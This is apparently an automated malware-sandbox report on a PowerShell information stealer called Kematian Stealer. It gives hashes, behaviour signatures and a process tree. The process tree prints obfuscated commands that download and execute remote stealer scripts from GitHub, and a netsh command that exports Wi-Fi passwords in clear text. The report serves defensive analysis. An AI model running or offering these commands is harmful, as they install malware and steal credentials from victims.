Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
05/07/2024, 01:04
Static task
static1
Behavioral task
behavioral1
Sample
18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358.ps1
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358.ps1
Resource
win10v2004-20240704-en
General
-
Target
18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358.ps1
-
Size
72KB
-
MD5
51299f3a266034e35d706a1d0aa5580b
-
SHA1
3c9ef68f69b9f8c2941e9d765ae0ae8df9bfdf14
-
SHA256
18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358
-
SHA512
b125b9e91fd5b3516ed5218d47316a9f4c6f052ae7c4d517eae18abb8643f1145adf117eb2d852ee684e1ffef4d85c0aab33935cebc0effc11e3f160a5bb0b23
-
SSDEEP
1536:F8SdVn5ahg5yYp6zdv/5l05Qo8l01zhwZPhZcLrJS7srHX6Cg:F8SdVn5Uwiv/5IQo8l01zhw5hUr9KCg
Malware Config
Extracted
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
Extracted
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 7 1856 powershell.exe 9 1856 powershell.exe 14 5088 powershell.exe 16 5088 powershell.exe 17 4376 powershell.exe 20 4376 powershell.exe 22 4376 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 16 raw.githubusercontent.com 20 raw.githubusercontent.com 15 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
pid Process 1856 powershell.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 5088 powershell.exe 5088 powershell.exe 1856 powershell.exe 1856 powershell.exe 4376 powershell.exe 4376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1856 powershell.exe Token: SeIncreaseQuotaPrivilege 1856 powershell.exe Token: SeSecurityPrivilege 1856 powershell.exe Token: SeTakeOwnershipPrivilege 1856 powershell.exe Token: SeLoadDriverPrivilege 1856 powershell.exe Token: SeSystemProfilePrivilege 1856 powershell.exe Token: SeSystemtimePrivilege 1856 powershell.exe Token: SeProfSingleProcessPrivilege 1856 powershell.exe Token: SeIncBasePriorityPrivilege 1856 powershell.exe Token: SeCreatePagefilePrivilege 1856 powershell.exe Token: SeBackupPrivilege 1856 powershell.exe Token: SeRestorePrivilege 1856 powershell.exe Token: SeShutdownPrivilege 1856 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeSystemEnvironmentPrivilege 1856 powershell.exe Token: SeRemoteShutdownPrivilege 1856 powershell.exe Token: SeUndockPrivilege 1856 powershell.exe Token: SeManageVolumePrivilege 1856 powershell.exe Token: 33 1856 powershell.exe Token: 34 1856 powershell.exe Token: 35 1856 powershell.exe Token: 36 1856 powershell.exe Token: SeIncreaseQuotaPrivilege 1856 powershell.exe Token: SeSecurityPrivilege 1856 powershell.exe Token: SeTakeOwnershipPrivilege 1856 powershell.exe Token: SeLoadDriverPrivilege 1856 powershell.exe Token: SeSystemProfilePrivilege 1856 powershell.exe Token: SeSystemtimePrivilege 1856 powershell.exe Token: SeProfSingleProcessPrivilege 1856 powershell.exe Token: SeIncBasePriorityPrivilege 1856 powershell.exe Token: SeCreatePagefilePrivilege 1856 powershell.exe Token: SeBackupPrivilege 1856 powershell.exe Token: SeRestorePrivilege 1856 powershell.exe Token: SeShutdownPrivilege 1856 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeSystemEnvironmentPrivilege 1856 powershell.exe Token: SeRemoteShutdownPrivilege 1856 powershell.exe Token: SeUndockPrivilege 1856 powershell.exe Token: SeManageVolumePrivilege 1856 powershell.exe Token: 33 1856 powershell.exe Token: 34 1856 powershell.exe Token: 35 1856 powershell.exe Token: 36 1856 powershell.exe Token: SeIncreaseQuotaPrivilege 1856 powershell.exe Token: SeSecurityPrivilege 1856 powershell.exe Token: SeTakeOwnershipPrivilege 1856 powershell.exe Token: SeLoadDriverPrivilege 1856 powershell.exe Token: SeSystemProfilePrivilege 1856 powershell.exe Token: SeSystemtimePrivilege 1856 powershell.exe Token: SeProfSingleProcessPrivilege 1856 powershell.exe Token: SeIncBasePriorityPrivilege 1856 powershell.exe Token: SeCreatePagefilePrivilege 1856 powershell.exe Token: SeBackupPrivilege 1856 powershell.exe Token: SeRestorePrivilege 1856 powershell.exe Token: SeShutdownPrivilege 1856 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeSystemEnvironmentPrivilege 1856 powershell.exe Token: SeRemoteShutdownPrivilege 1856 powershell.exe Token: SeUndockPrivilege 1856 powershell.exe Token: SeManageVolumePrivilege 1856 powershell.exe Token: 33 1856 powershell.exe Token: 34 1856 powershell.exe Token: 35 1856 powershell.exe Token: 36 1856 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1856 wrote to memory of 5084 1856 powershell.exe 84 PID 1856 wrote to memory of 5084 1856 powershell.exe 84 PID 5084 wrote to memory of 3680 5084 csc.exe 85 PID 5084 wrote to memory of 3680 5084 csc.exe 85 PID 1856 wrote to memory of 2776 1856 powershell.exe 87 PID 1856 wrote to memory of 2776 1856 powershell.exe 87 PID 1856 wrote to memory of 2208 1856 powershell.exe 90 PID 1856 wrote to memory of 2208 1856 powershell.exe 90 PID 1856 wrote to memory of 5088 1856 powershell.exe 91 PID 1856 wrote to memory of 5088 1856 powershell.exe 91 PID 5088 wrote to memory of 916 5088 powershell.exe 92 PID 5088 wrote to memory of 916 5088 powershell.exe 92 PID 916 wrote to memory of 2696 916 csc.exe 93 PID 916 wrote to memory of 2696 916 csc.exe 93 PID 1856 wrote to memory of 4376 1856 powershell.exe 94 PID 1856 wrote to memory of 4376 1856 powershell.exe 94 PID 1856 wrote to memory of 1512 1856 powershell.exe 96 PID 1856 wrote to memory of 1512 1856 powershell.exe 96 PID 1512 wrote to memory of 4624 1512 csc.exe 97 PID 1512 wrote to memory of 4624 1512 csc.exe 97
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fh5qbbux\fh5qbbux.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9CAD.tmp" "c:\Users\Admin\AppData\Local\Temp\fh5qbbux\CSC4A81311043EB4ECEA75E59D69BE83BC4.TMP"3⤵PID:3680
-
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv2⤵PID:2776
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\Admin\AppData\Local\Temp\wifi key=clear2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ip5rfkm\4ip5rfkm.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3CB.tmp" "c:\Users\Admin\AppData\Local\Temp\4ip5rfkm\CSC54E56A0DF6484684AAFDF7169454B82F.TMP"4⤵PID:2696
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4376
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bntuvrcs\bntuvrcs.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2352.tmp" "c:\Users\Admin\AppData\Local\Temp\bntuvrcs\CSC301703BDED7A40D180657B6C29794BE0.TMP"3⤵PID:4624
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5589c3ec0702fd9e3920c1f07750a8960
SHA1d3f542319a1e26561acd292c4145cfb15e1cdfda
SHA2567f8ae15f939de3cd5849057a8d155f8bced914451fa512e009019c56305a2a33
SHA512cda38ee434943e390e547271b55d4b81bbed17c0691212201b58ced6b2dccae0b52f4b610d4f643676dfd56a2e30022ed922b327363f1856cd4e7a74be34c9a4
-
Filesize
5KB
MD5a8de6cd9f1f6bdcc7cf069f0a589edeb
SHA1a31c335117408a09ecbcc429f1bdb800db4d6c5e
SHA25642405d02e3450fc88c1e72500b83bd7f69b056baea7593e2bef79e43f63e257b
SHA5127412138591efddcf79e6e27f01f663c9763f3e11f94ec8f6f484f327d8be2364a948f48ceadd5b87527bfe749636dea73febfbdcde11360aa79550e6437f03ba
-
Filesize
1KB
MD5ce9e8c3077b5e1fed61ba47bf748307e
SHA1a92592fd7d1b18d5581ca50756dd1a819e09d04d
SHA2568d0df979cb53f5d18f254b61bf9e92b8ec02a6ab486a59896a66c9e01855686d
SHA512a9493e5b64591e6529a366a7ee067d64fc12a641f3d160f9150abebcedaffe7e9230766b8c3e213a35187dd3da675efd02ccc8ec835d33128300ba5fd005f4b1
-
Filesize
1KB
MD505a84bf289408ae7c6bd3e4136f07f6f
SHA14d879255c158b0b9d785bbba09b031eead2c9c42
SHA256b0db157509228219fb16dff85afe3a2a82000738276bf65232acb87e76d9f2d3
SHA512ddf237f3cb7f8e9da5fcf3d2251a90ea160108829562d091d5283a968a78e25017fb4ab4b000c4a037b8750e71bb13e1b45f72c77bd433acc0150d8408030c58
-
Filesize
1KB
MD5f02e097f9a72bad1f964c64fdfadcb95
SHA1e04851eafbab6c9b9b6af982ad98d9e4d8494ddb
SHA256aa4361ac5afee0b1fb9102a2f70330b3df488d5fe0f1baebca29e9df7a0318e4
SHA512f2221c2c78eaf1fdec05cbc7436781184ada7202d1947eca4bf89fd533178aa0bb6c975c4532ee58fad722d965823d8a6dc0aab04855376f5213453b5f668abf
-
Filesize
65KB
MD58f1ad238f03be923005c7dee2ae982d3
SHA12b59d56aa6e32eccb18a25aeec859ea63cec5adc
SHA2566e53175ff34f0f74e27dbbe01e987406eb33862085b5703fd66e3fbae5b19cde
SHA512ab04d179c94afe504bef125583fec0052b68e7e388184f06d780a9751e5f9e8e8bc29d71343a7db9fe145967d2239f915dc3613207fdddcd0f81858025d0ffdc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5be8d9499edca49144aa479b8ebf1a57a
SHA17b3b1284f5434f00316ebcea8d76f2c0ec842ddf
SHA256e595202b020e81ded7bd8d3c23a638cfd81e60f0a0eac2fb8c3d2083c0d8f25a
SHA5128dd2f4a30319f4cbfa86bce3168fce5393231a845ed975ea5b26d6498a9ac79478b880e6686d8303d8e62924e5e88822bfbb24c7ce149c33a5d783ae7441d1d4
-
Filesize
4B
MD537a6259cc0c1dae299a7866489dff0bd
SHA12be88ca4242c76e8253ac62474851065032d6833
SHA25674234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b
SHA51204f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f
-
Filesize
3KB
MD556ca5f158db18dfcf6d2a56cfdd0baf1
SHA10bfb2bf6aa46fe977b552269218619b2382fcc18
SHA256751fe865041510d0c5be81c7de4259884f803427c60529d6b0f9cbe24e6c4fa8
SHA512120be44ccd6ff9f49e43a51e4e1920f6cb281042061b92883d9db853cbfca1a8b0b32a9375f1cfd9d18de8e766fe4435e0f167531a72d1b9edd837d562a2b8aa
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
Filesize
4KB
MD52a829317f65fea84eb85cb2376fa9e21
SHA12f223ea8738f9989385e93b9c8cf0e8fc5e30700
SHA256f99c46f447010a438586651fcdf9068394926247bf7656980fee066b2069fe8f
SHA512a438c35327297431df19fe50683619f78ea0245bb8d3aa7553c376c365b927747d8cb8343fc2cfb4de884dad4eb6166589afc98eba385137bb3405998838ace0
-
Filesize
712B
MD59d6f4cd89badc3257cc7254a159cf7a7
SHA1e9e0e31fd150a14bcf3715fa99159cb303f6ee6d
SHA256d632494718e4fb74251fbe082e522c0f00d5fa2e2a4e92b8b5baf9463bcb0690
SHA512bbc53e99743ec73c1aa4144977584395f8680d6410b634ebf979e9f7c8ead48458a3ad869f1cee74ada360d4641a20b36151bf2cdad2de237e71962aec1ae1ec
-
Filesize
652B
MD5c7e7b9be1edec54874030d0780df25f6
SHA18e3f96adc307007c3b33028837df690062b728a3
SHA25624e550829544813c2d47df1c3eccf0d2a0af286374b8e9202983b6042fc27c9b
SHA5128adde13c2a4f3d1ea21fcb99cf103b85941461ac37422dfc0f52d98a24c317ec53b01ca8dd774ef59e4a7e2b6d88917e5960fab9d4340df5ea83ce4ef6c7b01f
-
Filesize
652B
MD5451d862259e85b3e000d3177fb941ea0
SHA14f66a88c86bf8b3b16e5283ea59246169c4949c8
SHA256d2d4ea6fd697f7712b162f3df8f0fe4e7979c3eabf7fb1474098b9fec5820167
SHA512e55928882853c604be12454f70fdaadd6cb50b19bee23798e7e6c4d9fc241ef097fe9e17c2ef6419ebff60177b93eca63f692f9d2c5d4a3ba840be58b78878a5
-
Filesize
321B
MD5249ab1409c1ad0e025a82d513e4f7f12
SHA1f38f701e2e6be38739f36d04586f90f39babf2ad
SHA2569babf0e0294d1743f12c4fb3ddac50ca25c75accd223c4f1716d916f659c538c
SHA5123abcdec5ed668a291dde15344368549174d2562196285a3f521613c7bd3b1ab80f189439b08e7c4f57c5269f6159aa154c0cc503df3640bfc51712635c3a12bc
-
Filesize
369B
MD57e7646c74a530eb4c013edbae8c7017f
SHA16aa228a5ee9861adf14703f3b70e74e7be495659
SHA2564cc43f8191e09a97b3988851422b11c6e1ba56e23b64a88b3acc34ce8861ec43
SHA512db4c226fa9655182cedcab45766efa1c1d2a97e80d42a2bfb7bae74461919fa9344ca3155180754b0e4c565a913c725940b464842793f7516e1a5dedc4b20100
-
Filesize
652B
MD577c3811d9a314c193fb6dc04c9eb105a
SHA17b34d62217ebd0c36d5792a0215d837413164313
SHA2560860a854923184826f5bbda9e9a22ed4d7104194576fe57ed2b4d59b0fd02e09
SHA5125bfd0964d18b09165dacf1884a7d3907e361d14b34827f8ced24b571be4d0f4e5dad309ed5e2a23e5da1db731246d0f2e4e3c4c671a250305a7180b17b8992bd
-
Filesize
512B
MD5a36c5dbd22147371b4ea6ffacb560fb6
SHA1e7248cd6a49d3aae9439efdffaceeacad6a7c523
SHA256fc874c6cbd59c24e83702e0cd6f301c4a929865687d8e0d041090a2bcd801a60
SHA512256b2e0beea6305f21024d60acdb0dcc84c2da46824d1c0610a9a22fa0e8c1753271140db278baf26e260c381f13001be1e8c651b01a178ca0922a2ab1bf4361
-
Filesize
369B
MD56aa770d21d0f67049aac19a40bfab1b8
SHA101073f43eb83192db753bb91e6fe31baf7f4f4e0
SHA25690a978ec088c10a7b7eb5d106d04e3751fcf3eb64a38547b72b2bcfede18859a
SHA51243255ba7e506b5c96d534ccaca02b6c6c4a9fdc799203edd99899a7a93a12a042f8206405b961399f8ad0f232f83bc274ddf9a44f6e2216fe30ff2ba452642d9